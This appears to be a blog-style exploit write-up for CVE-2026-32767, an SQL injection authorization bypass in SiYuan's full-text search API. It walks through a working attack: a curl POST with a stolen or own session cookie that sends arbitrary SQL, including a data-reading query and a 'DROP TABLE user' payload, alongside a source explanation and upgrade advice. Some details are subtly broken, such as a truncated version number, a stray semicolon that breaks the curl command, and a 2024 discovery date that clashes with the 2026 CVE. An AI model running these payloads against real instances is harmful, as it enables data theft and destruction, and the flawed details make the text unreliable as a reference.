CVE-2026-32767 - SiYuan PMKS SQL Injection Auth Bypass (Exploit and Deep Dive)

SiYuan is a popular open-source personal knowledge management system. If you organize notes or documents, you may have used or heard about it. Recently, a serious security vulnerability (CVE-2026-32767) was found and fixed in SiYuan versions 3.6. and below. This issue allows any logged-in user — even those with the lowest "Reader" privileges — to run arbitrary SQL commands on the application's database, leading to potential data theft, data deletion, and other risks.

Below, you’ll find a clear explanation of how this vulnerability works, a code snippet showing the exploit, and suggestions for what to do next. This is exclusive content with hands-on examples written in clear, simple terms.

Vulnerable Endpoint

- Endpoint: /api/search/fullTextSearchBlock

Code Snippet: How an Attacker Would Exploit This

Scenario: You’re a "Reader" and want to see all user emails.

Step 1: Authenticate and grab your session token or cookie.

Step 2: Send a POST request to /api/search/fullTextSearchBlock with the body

{
  "method": 2,
  "sql": "SELECT id, email FROM user"
}

*You can use curl, Postman, or any HTTP client:*

curl -X POST "https://YOUR_SIYUAN_INSTANCE/api/search/fullTextSearchBlock"; \
     -H "Content-Type: application/json" \
     -H "Cookie: auth_token=YOUR_SESSION_COOKIE" \
     -d '{"method":2,"sql":"SELECT id, email FROM user"}'

*For a DELETE or DROP attack:*

{
  "method": 2,
  "sql": "DROP TABLE user"
}

Why This Works: Source Code Dive

- The endpoint /api/search/fullTextSearchBlock does not check for admin or read-only status.

It passes the sql parameter directly to SQLite if method==2.

- Contrast: /api/query/sql applies security checks via CheckAdminRole and CheckReadonly middleware.

Thus, any authenticated user can run *ANY* SQL command, which completely undermines SiYuan’s security model.

Timeline and Fix

- Reported / discovered: May 2024
- Fixed in: v3.6.1 (release notes)

Vulnerable: v3.6. and below

> If you're running SiYuan, upgrade to 3.6.1 or later immediately.

References and Further Reading

- Official Release Fix: SiYuan 3.6.1 Release
- CVE Record: CVE-2026-32767 on MITRE *(May not be live yet.)*
- Project GitHub: SiYuan on GitHub

Conclusion

If you or your team is running SiYuan, this is a critical security issue: *all logged-in users* can become your database admin. Patch right now.

Stay vigilant, and secure your notes!

*This is original analysis written for security practitioners and SiYuan users. Please do not attempt unauthorized attacks against any systems you do not own or manage.*

Timeline

Published on: 03/20/2026 00:13:31 UTC
Last modified on: 03/20/2026 01:15:55 UTC